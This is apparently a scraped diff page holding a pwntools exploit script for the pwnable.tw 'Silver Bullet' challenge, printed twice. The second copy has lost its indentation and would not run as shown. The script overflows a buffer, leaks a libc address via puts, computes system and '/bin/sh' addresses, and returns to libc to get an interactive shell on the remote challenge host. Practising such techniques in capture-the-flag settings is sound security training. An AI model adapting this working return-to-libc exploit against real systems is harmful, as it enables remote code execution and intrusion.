TommyWu-fdgkhdkgh · September 30, 2019 00:28
diff --git a/pwnable_tw_silver_bullet.py b/pwnable_tw_silver_bullet.py
 from pwn import *
 import sys
 def create(data):
        word = r.recvuntil("choice :")
        print word
        r.sendline("1")
        word = r.recvuntil("bullet :")
        print word
        r.send(data)

 def power(data):
        word = r.recvuntil("choice :")
        print word
        r.sendline("2")
        word = r.recvuntil("of bullet :")
        print word
        r.send(data)
 def beat():
        word = r.recvuntil("choice :")
        print word
        r.sendline("3")
 def exit():
        word = r.recvuntil("choice :")
        print word
        r.sendline("4")



 #select remote or local
 if len(sys.argv) == 2:
        if  sys.argv[1][0]=='l':
                r = process("./silver_bullet", env={"LD_LIBRARY_PATH" : "/lib32"})
                #sh = process("./hacknote")
        else:
                r = remote("chall.pwnable.tw",10103)
 else:
        print "gg"


 got_stdin = 0x804b020
 main_addr = 0x8048954
 puts_plt  = 0x80484a8


 create("g"*(0x30-1))

 power("g")
 power("\xff\xff\x7f"+"a"*4+p32(puts_plt)+p32(main_addr)+p32(got_stdin))

 beat()
 beat()

 r.recvuntil("Oh ! You win !!\n")
 word = r.recv(10)

 for i in word:
        print hex(ord(i))

 index=0
 libc = word[0:4]
 libc = u32(libc)
 libc = libc - 0x1b05a0
 system_addr = libc + 0x3a940
 #sh_addr = libc + 0x15902b
 sh_addr = libc + 0x158e8b
 #原來本地端的sh偏移還是會有一點不同
 #好扯，到底為什麼


 print hex(libc)
 print hex(system_addr)

 #return to puts plt -> get libc base
 #next, return to main   

 #and then, we return to libc
 create("g"*(0x30-1))

 power("g")
 #power("\xff\xff\x7f"+"a"*4+p32(system_addr)+"a"*4+p32(libc_addr))
 power("\xff\xff\x7f"+"a"*4+p32(system_addr)+p32(sh_addr)+p32(sh_addr)+p32(sh_addr))

 beat()
 beat()


 r.interactive()
	from pwn import *
	import sys
	def create(data):
	word = r.recvuntil("choice :")
	print word
	r.sendline("1")
	word = r.recvuntil("bullet :")
	print word
	r.send(data)

	def power(data):
	word = r.recvuntil("choice :")
	print word
	r.sendline("2")
	word = r.recvuntil("of bullet :")
	print word
	r.send(data)
	def beat():
	word = r.recvuntil("choice :")
	print word
	r.sendline("3")
	def exit():
	word = r.recvuntil("choice :")
	print word
	r.sendline("4")



	#select remote or local
	if len(sys.argv) == 2:
	if sys.argv[1][0]=='l':
	r = process("./silver_bullet", env={"LD_LIBRARY_PATH" : "/lib32"})
	#sh = process("./hacknote")
	else:
	r = remote("chall.pwnable.tw",10103)
	else:
	print "gg"


	got_stdin = 0x804b020
	main_addr = 0x8048954
	puts_plt = 0x80484a8


	create("g"*(0x30-1))

	power("g")
	power("\xff\xff\x7f"+"a"*4+p32(puts_plt)+p32(main_addr)+p32(got_stdin))

	beat()
	beat()

	r.recvuntil("Oh ! You win !!\n")
	word = r.recv(10)

	for i in word:
	print hex(ord(i))

	index=0
	libc = word[0:4]
	libc = u32(libc)
	libc = libc - 0x1b05a0
	system_addr = libc + 0x3a940
	#sh_addr = libc + 0x15902b
	sh_addr = libc + 0x158e8b
	#原來本地端的sh偏移還是會有一點不同
	#好扯，到底為什麼


	print hex(libc)
	print hex(system_addr)

	#return to puts plt -> get libc base
	#next, return to main

	#and then, we return to libc
	create("g"*(0x30-1))

	power("g")
	#power("\xff\xff\x7f"+"a"4+p32(system_addr)+"a"4+p32(libc_addr))
	power("\xff\xff\x7f"+"a"*4+p32(system_addr)+p32(sh_addr)+p32(sh_addr)+p32(sh_addr))

	beat()
	beat()


	r.interactive()
No results found